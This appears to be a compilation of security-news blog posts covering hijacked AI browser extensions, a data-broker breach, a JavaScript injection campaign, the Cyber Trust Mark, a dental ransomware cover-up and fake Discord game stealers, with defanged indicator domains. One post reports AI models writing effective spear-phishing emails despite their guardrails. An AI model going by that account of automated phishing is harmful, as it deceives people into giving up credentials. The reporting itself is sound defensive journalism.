• Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
• Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
• Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
• Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
• Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
• Consider not storing your card details. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
• Set up identity monitoring. Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

Small businesses and boutique organizations should use caution when leaning on browser-friendly artificial intelligence (AI) tools to generate ideas, content, and marketing copy, as a set of Google Chrome extensions were recently compromised to deliver info-stealing malware disguised as legitimate updates.

Analyzed by researchers at Extension Total, the cybercriminal campaign has managed to take over the accounts of at least 36 Google Chrome extensions that provide AI and VPN services. The compromised extensions include “Bard AI Chat,” “ChatGPT for Google Meet,” “ChatGPT App,” “ChatGPT Quick Access,” “VPNCity,” “Internxt VPN,” and more, which are used by an estimated total of 2.6 million people.

Though these browser extensions borrow the names of the most popular AI tools available today, they are third-party tools that are not developed by Open AI—the company behind ChatGPT—or Google.

In response to the attack, many of the compromised browser extensions removed their tools from the Google Chrome web store to protect users. However, other extensions remain available and in the control of cybercriminals, making them dangerous to download.

There isn’t a startup, small business, or solo practitioner today who can run their operations without a web browser, and the most popular web browser in the world—by far—is Google Chrome.

But this cybercriminal campaign has not compromised Google Chrome itself.

Instead, it has compromised a series of extensions for Google Chrome that could prove attractive to many small businesses looking to harness AI, whether to write email newsletters, edit blogs, or even get ideas for marketing strategies in the new year. These third-party browser extensions, when they were still available, allowed users to directly ask questions to AI tools without needing to navigate away from a current web page.

But with the new attack, those same browser extensions are now delivering fraudulent updates that carry malicious code that can steal an employee’s data.

According to an investigation published by one of the compromised browser extension companies, the malware used in this attack sought data for Facebook Ads accounts. That may sound like a narrow goal, but considering that so many businesses rely on promotion and visibility through Facebook Ads, it isn’t uncommon that this information might be stored on an employee’s computer.

For a full list of compromised extensions, visit here.

Until fixes are released for every compromised extension, warn your employees about which browser extensions are safe to use, and consider creating a policy about only trusting first-party browser extensions for work.

For all other threats, try Malwarebytes Teams, which provides always-on protection against malware, ransomware, spyware, and more, along with 24/7 dedicated, human support.

Like many other data brokers, Gravy is a company you may never have heard of, but it almost certainly knows a lot about you if you’re a US citizen.

Data brokers come in different shapes and sizes. What they have in common is that they gather personally identifiable data from various sources—from publicly available data to stolen datasets—and then sell the gathered data on. Gravy Analytics specializes in location intelligence, meaning it collects sensitive phone location and behavior data.

One of the buyers is the US government who increasingly circumvents the need to get a warrant by simply buying what they want to know from a data broker. Ironic, given that the FTC sued Gravy Analytics after saying it routinely collects sensitive phone location and behavior data without getting the consent of consumers.

In the complaint last month, the FTC claimed:

“Respondents {Gravy Analytics and Venntel, a wholly owned subsidiary of Gravy Analytics) have bought, obtained, and collected precise consumer location data and offered for sale, sold, and distributed products and services created from or based on the consumer location data.”

Data brokers have drawn attention this year by leaking several large databases, with the worst being the National Public Data leak. The data breach made international headlines because it affected hundreds of millions of people, and it included Social Security Numbers.

And now, apparently, it’s Gravy Analytics’ turn to be breached. According to 404 Media, cybercriminals breached Gravy Analytics and stole a massive amount of data, including customer lists, information on the broader industry, and location data harvested from smartphones which show peoples’ precise movements.

The cybercriminals claim to have stolen 17TB of data and are threatening to publish the data. Considering the sensitivity of location data for some groups, this breach could potentially be just as significant as the National Public Data leak.

To prove their possession of the data, the cybercriminals have shared three samples on a Russian forum, exposing millions of location points across the US, Russia, and Europe.

The researcher that posted this map extracted the names of 3455 apps that leaked this information. Many of these apps are games, but we also noted Tinder and a host of apps that are promoted as TikTok video downloaders.

404 Media reports that the personal data of millions of users is affected.

The Gravy Analytics website is down at the moment of writing and nobody at the company has answered any queries with an official reaction.

The whole ordeal, whether the data will be published or not, proves once again why data brokers should stop trading health and location data.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

This article was researched and written by Stefan Dasic, manager, research and response for ThreatDown, powered by Malwarebytes

Malwarebytes recently uncovered a widespread cyberattack—referred to here as the “zqxq” campaign as it closely mirrors NDSW/NDSX-style malware behavior—that compromised GroupGreeting[.]com, a popular platform used by major enterprises to send digital greeting cards.  

This attack is part of a broader malicious campaign that takes advantage of trusted websites with high traffic, especially those that could experience a spike in visitors during busy seasons like the winter holidays. That includes greeting card websites, like GroupGreeting[.]com, that allow users to send group e-cards for birthdays, retirements, weddings, and, of course, holidays like Christmas and New Year’s.  

According to public data, over 2,800 websites have been hit with similar malicious code. The seasonal increase in user interactions with greeting card sites provides ample opportunities for cybercriminals to quietly inject malware and target unsuspecting visitors. 

Explaining the “zqxq” malware

Understanding this cybercriminal campaign requires a little bit of understanding of the web. Online today, nearly every single modern webpage uses a programming language called JavaScript. JavaScript allows developers to make interactive webpages, but it can also be vulnerable to attacks, as cybercriminals can “inject” pieces of JavaScript into a website that are not approved by the site’s developers. 

At the core of this breach is an obfuscated JavaScript snippet designed to blend in with legitimate site files. Hidden within themes, plugins, or other critical scripts, the malicious code uses scrambled variables (e.g., zqxq) and custom functions (HttpClient, rand, token) to evade detection and hamper analysis. 

Despite its complexity, the malware performs some very typical functions seen in large-scale JavaScript injection campaigns: 

• Token generation and redirection. Generates random tokens (rand() + rand()) for queries or URLs, a technique often used in Traffic Direction Systems (TDS) to disguise malicious links. 

• Conditional checks and evasion. References properties in navigator, document, window, or screen to determine if the user has visited before, or to avoid re-infecting the same machine. This helps keep the campaign under the radar by reducing repeated alerts. 

• Remote payload retrieval. Uses an XMLHttpRequest (labeled as HttpClient in the code) to silently fetch further malicious scripts or to redirect visitors to exploit kits, phishing sites, or other malicious destinations. 

Overlap with NDSW/NDSX and TDS Parrot campaigns 

Though Malwarebytes recently discovered the attack on GroupGreeting[.]com, the malware campaign bears similarities to another malware injection campaign that is referred to as both “NDSW/NDSX” and “TDS Parrot.” 

According to security researchers from Sucuri, who label these attacks under the “NDSW/NDSX” moniker, this campaign accounted for 43,106 detections in 2024. Similar research was published by Unit 42, which refers to the campaign as “TDS Parrot.”  

From these analyses, we can identify the following parallels to known NDSW/NDSX or TDS Parrot malware campaigns: 

• Obfuscated redirect scripts. Much like NDSW/NDSX, the zqxq script deeply obfuscates its variables, methods, and flow. The layering of functions (Q, d, rand, token) and the repeated usage of base64-like decoding are standard indicators of TDS JavaScript-based threats. 

• Traffic Distribution System behavior. After running checks (e.g., domain name, cookies), these scripts funnel traffic to external pages hosting additional malware payloads or phishing sites. This is precisely how TDS Parrot campaigns divert user traffic across multiple malicious domains to maximize infection rates. 

• Large-scale website infections. Both NDSW/NDSX and the zqxq campaign have infected thousands of websites, suggesting a systematic approach—possibly automated—that exploits vulnerabilities in popular CMS platforms (like WordPress, Joomla, or Magento) or outdated plugins, similar to documented TDS Parrot behaviors. 

Analysis of the breach and why GroupGreeting was a prime target 

Cybercriminals hardly strike at random. Instead, the attack on GroupGreeting was likely coordinated because of its potential for success. Here are a few reasons why: 

• High-profile site. GroupGreeting boasts over 25,000 workplace clients, including major brands like Airbnb, Coca-Cola, and eBay, making it a lucrative target. Visitors are more inclined to trust links from a service they deem reputable. 

• Seasonal traffic spikes. During holidays and other high-traffic periods, the site sees a surge in e-card use. Cybercriminals exploit this surge to maximize the spread of redirects and malware. 

• Sophisticated persistence. Malicious code can hide in multiple files or within the database. Deleting one infected file may not remove all traces, allowing reinfection to occur. 

• Potential consequences. Once the malware activates in a user’s browser, it typically redirects them to external domains that host secondary payloads. These payloads can range from phishing pages—designed to steal credentials—to more devastating forms of malware like info stealers or ransomware. Attackers often generate random or “tokenized” URLs, making it difficult for basic blocklists to keep pace. 

Prevention and remediation 

• Timely patching and updates. Attacks often succeed by exploiting vulnerabilities in outdated CMS installations or plugins, underscoring the importance of regular updates. 

• File integrity checks. Automated monitoring systems can detect and flag any unauthorized file changes, prompting swift action. 

• User training. Educate users on potential risks and signs of compromise—even “safe” or well-known websites can be hijacked. 

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

The White House announced the launch of the US Cyber Trust Mark which aims to help buyers make an informed choice about the purchase of wireless internet-connected devices, such as baby monitors, doorbells, thermostats, and more.

The cybersecurity labeling program for wireless consumer Internet of Things (IoT) products is voluntary but the participants include several major manufacturers, retailers, and trade associations for popular electronics, appliances, and consumer products. The companies and groups said they are committed to increase cybersecurity for the products they sell.

Justin Brookman, director of technology policy at the consumer watchdog organization Consumer Reports, lauded the government effort and the companies that have already pledged their participation.

“Consumer Reports is eager to see this program deliver a meaningful U.S. Cyber Trust Mark that lets consumers know their connected devices meet fundamental cybersecurity standards,” Brookman said in a news release. “The mark will also inform consumers whether or not a company plans to stand behind the product with software updates and for how long.”

The Federal Communications Commission (FCC) proposed and created the labelling program and hopes it will raise the bar for cybersecurity across common devices, including smart refrigerators, smart microwaves, smart televisions, smart climate control systems, smart fitness trackers, and more.

The idea is that the Cyber Trust Mark logo will be accompanied by a QR code that consumers can scan for easy-to-understand details about the security of the product, such as the support period for the product and whether software patches and security updates are automatic.

The program is challenging because of the wide variety of consumer IoT products on the market that communicate over wireless networks. These products are built on different technologies, each with their own security pitfalls, so it will be hard to compare them, but at least the consumer will be able to find some basic—but important—information.

Even though participation is voluntary, manufacturers will be incentivized to make their smart devices more secure to keep the business of consumers who will choose products that only have the Cyber Trust Mark.

As we explained recently, the “Internet of Things” is the now-accepted term to describe countless home products that connect to the internet so that they can be controlled and monitored from a mobile app or from a web browser on your computer. The benefits are obvious for shoppers. Thermostats can be turned off during vacation, home doorbells can be answered while at work, and gaming consoles can download videogames as children sleep.”

And in 2024 we saw several mishaps ranging from privacy risks to downright unacceptable abuse. So, if we can avoid these incidents from happening again, then it surely is worth the trouble.

The testing of whether a product deserves the Cyber Trust Mark will be done by accredited labs and against established cybersecurity criteria from the National Institute of Standards and Technology (NIST).

The Cyber Trust Mark has been under constructions for quite a while was approved in a bipartisan unanimous vote last March, but we can expect the first logos to show up this year. And Anne Neuberger, deputy national security adviser for cyber, revealed that there are plans to release another executive order saying that, beginning in 2027, the Federal government will only buy devices that have the Cyber Trust Mark label on them.

For now, the program does not apply to personal computers, smartphones, and routers.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

One of the first things everyone predicted when artificial intelligence (AI) became more commonplace was that it would assist cybercriminals in making their phishing campaigns more effective.

Now, researchers have conducted a scientific study into the effectiveness of AI supported spear phishing, and the results line up with everyone’s expectations: AI is making it easier to do crimes.

The study, titled Evaluating Large Language Models’ Capability to Launch Fully Automated Spear Phishing Campaigns: Validated on Human Subjects, evaluates the capability of large language models (LLMs) to conduct personalized phishing attacks and compares their performance with human experts and AI models from last year.

To this end the researchers developed and tested an AI-powered tool to automate spear phishing campaigns. They used AI agents based on GPT-4o and Claude 3.5 Sonnet to search the web for available information on a target and use this for highly personalized phishing messages.

With these tools, the researchers achieved a click-through rate (CTR) that marketing departments can only dream of, at 54%. The control group received arbitrary phishing emails and achieved a CTR of 12% (roughly 1 in 8 people clicked the link).

Another group was tested against an email generated by human experts which proved to be just as effective as the fully AI automated emails and got a 54% CTR. But the human experts did this at 30 times the cost of the AI automated tools.

The AI tools with human assistance outperformed the CTR of these groups by scoring 56% at 4 times the cost of the AI automated tools. This means that some (expert) human input can improve the CTR, but is it enough to invest the time? Cybercriminals are proverbially lazy, which means they often exhibit a preference for efficiency and minimal effort in their operations, so we don’t expect them to think the extra 2% to be worth the investment.

The research also showed a significant improvement of the deceptive capabilities of AI models compared to last year, where studies found that AI models needed human assistance to perform on par with human experts.

The key to the success of a phishing email is the level of personalization that can be achieved by the AI assisted method and the base for that personalization can be provided by an AI web-browsing agent that crawls publicly available information.

Example from the paper showing how collected information is used to write a spear phishing email

Based on information found online about the target, they are invited to participate in a project that aligns with their interest and presented with a link to a site where they can find more details.

The AI-gathered information was accurate and useful in 88% of cases and only produced inaccurate profiles for 4% of the participants.

Other bad news is that the researchers found that the guardrails which are supposed to stop AI models from assisting cybercriminals are not a noteworthy barrier for creating phishing mails with any of the tested models.

The good news is that LLMs are also getting better at recognizing phishing emails. Claude 3.5 Sonnet scored well above 90% with only a few false alarms and detected several emails that passed human detection. Although it struggles with some phishing emails that are clearly suspicious to most humans.

If you’re looking for some guidance how to recognize AI assisted phishing emails, we’d like you to read: How to recognize AI-generated phishing mails. But the best way is to always remember the general advice not to click on any links in unsolicited emails.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

A US chain of dental offices known as Westend Dental LLC denied a 2020 ransomware attack and its associated data breach, instead telling their customers that data was lost due to an “accidentally formatted hard drive.”

Unfortunately for the organization, the truth was found out. Westend Dental agreed to settle several violations of the Health Insurance Portability and Accountability Act (HIPAA) in a penalty of $350,000.

In October 2020, Westend Dental was attacked by the Medusa Locker ransomware group. Medusa Locker is a type of ransomware that operates under a Ransomware-as-a-Service (RaaS) model, primarily targeting large enterprises in sectors such as healthcare and education. This ransomware is known for employing double extortion tactics, which means they encrypt victims’ data while also threatening to release sensitive information unless a ransom is paid.

Westend Dental decided not to submit the mandatory notification within 60 days, waiting until October 28, 2022—two years later—to submit a data breach notification form to the State of Indiana.

The Indiana Office of Inspector General (OIG) later uncovered evidence that Westend Dental had experienced a ransomware attack on or around October 20, 2020, involving state residents’ protected health information, but Westend Dental still denied there had been a data breach. The investigation was prompted by a consumer complaint from a Westend Dental patient regarding an unfulfilled request for dental records.

In January 2023 a witness confirmed there had been a data breach, which prompted the Indiana OIG to initiate a wider investigation to assess compliance with the HIPAA rules and state laws. This investigation revealed extensive HIPAA violations.

A selection of the other violations that were found during the investigation include:

• HIPAA policies and procedures were not given to or made readily available to employees.
• The company provided no HIPAA training for employees prior to November 2023.
• Nothing showed evidence that a HIPAA-compliant risk analysis had ever been conducted (lists of usernames and passwords in plain text on the compromised server).
• There were no password policies until at least January 2024 (the same username and password were used for all Westend Dental servers that contained protected health information).
• No physical safeguards were implemented to limit access to servers containing patient data. (Some servers were located, unprotected, in employee break rooms and bathrooms.)

Court documents also reveal that because Westend Dental did not conduct a forensic investigation, the exact number of people affected by the breach is unknown. We do know that Westend Dental served around 17,000 patients across all companies and practices at the time of the ransomware attack.

The attackers initially gained access to at least one server, but since there was no monitoring software in place, it is unknown how far the attackers were able to infiltrate other systems. And since the backups that were made by a third party turned out to be incomplete, they were also unable to inform affected patients.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

During the holiday period on Malwarebytes Labs we covered:

• A day in the life of a privacy pro, with Ron de Jesus (Lock and Code S05E26)
• Task scams surge by 400%, but what are they?
• 5 million payment card details stolen in painful reminder to monitor Christmas spending
• AI-generated malvertising “white pages” are fooling detection engines
• Pallet liquidation scams and how to recognize them
• TP-Link faces US national security probe, potential ban on devices
• “Fix It” social-engineering scheme impersonates several brands
• Our Santa wishlist: Stronger identity security for kids
• 2024 in AI: It’s changed the world, but it’s not all good
• Is nowhere safe from AI slop? (Lock and Code S05E27)
• Data breaches in 2024: Could it get any worse?
• Connected contraptions cause conniption for 2024
• “Can you try a game I made?” Fake game sites lead to information stealers

And on the ThreatDown blog we covered:

• Top 5 most dangerous software weaknesses in 2024
• Cleo, the next MOVEit and GoAnywhere?
• Sysrv cryptomining botnet is still alive (and kicking out the competition)
• Clipboard hijacker tries to install a Trojan
• What is session hijacking?
• Which ports to monitor for ransomware attacks

Stay safe!

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

The background and the IOCs for this blog were gathered by an Expert helper on our forums and Malwarebytes researchers. Our thanks go out to them.

A new, malicious campaign is making the rounds online and it starts simple: Unwitting targets receive a direct message (DM) on a Discord server asking about their interest in beta testing a new videogame (targets can also receive a text message or an email). Often, the message comes from the “developer” themselves, as asking whether you can try a game that they personally made is a common method to lure victims.

If interested, the victim will receive a download link and a password for the archive containing the promised installer.

The archives are offered for download on various locations like Dropbox, Catbox, and often on the Discord content delivery network (CDN), by using compromised accounts which add extra credibility.

What the target will actually download and install is in reality an information stealing Trojan.

There are several variations going around. Some use NSIS installers, but we have also seen MSI installers. There are also various information stealers being spread through these channels like the Nova Stealer, Ageo Stealer, or the Hexon Stealer.

The Nova Stealer and the Ageo Stealer are a Malware-as-a-Service (MaaS) stealer where criminals rent out the malware and the infrastructure to other criminals. It specializes in stealing credentials stored in most browsers, session cookie theft for platforms like Discord and Steam, and information theft related to cryptocurrency wallets.

Part of the Nova Stealer’s infrastructure is a Discord webhook which allows the criminals to have the server send data to the client whenever a certain event occurs. So they don’t have to check regularly for information, they will be alerted as soon as it gets in.

The Hexon stealer is relatively new, but we know it is based on Stealit Stealer code and capable of exfiltrating Discord tokens, 2FA backup codes, browser cookies, autofill data, saved passwords, credit card details, and even cryptocurrency wallet information.

One of the main interests for the stealers seem to be Discord credentials which can be used to expand the network of compromised accounts. This also helps them because some of the stolen information includes friends accounts of the victims. By compromising an increasing number of Discord accounts, criminals can fool other Discord users into believing that their everyday friends and contacts are speaking with them, emotionally manipulating those users into falling for even more scams and malware campaigns.

But the end goal to this scam, and most others, is monetary gain. So keep an eye on your digital and flat currency if you’ve fallen for one of these scams.

How to recognize the fake game sites

There is one very active campaign that uses a standard template for the website. This makes it easier for the cybercriminals to change name and location, but also for us to recognize them.

Example of the templated fake website

The websites are hosted by various companies that are very unresponsive to take down requests and usually protected by Cloudflare which adds an extra layer of difficulty for researchers looking to get the sites taken down. At which point they will easily set up a new one.

Another campaign uses blogspot to host their malware. These sites on blogspot have a different, but also standard, design.

blogspot template

Other effective measures to stay safe from these threats include:

• Having an up-to-date and active anti-malware solution on your computer.
• Verifying invitations from “friends” through a different channel, such as texting them directly or contacting them on another social media platform. Remember, their current account may have been compromised.
• Remembering to not act upon unsolicited messages and emails, especially when they want you to download and install something.

IOCs

Download sites:

dualcorps[.]fr

leyamor[.]com

crystalsiege[.]com

crystalsiege[.]online

dungeonofdestiny[.]pages.dev

mazenugame[.]blogspot.com

mazenugames.[]blogspot.com

yemozagame[.]blogspot.com

domenubeta[.]blogspot.com

domenugame[.]blogspot.com

The known download sites will be blocked by Malwarebytes/ThreatDown products which will also detect the information stealers.

We don’t just report on threats – we help protect your social media

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.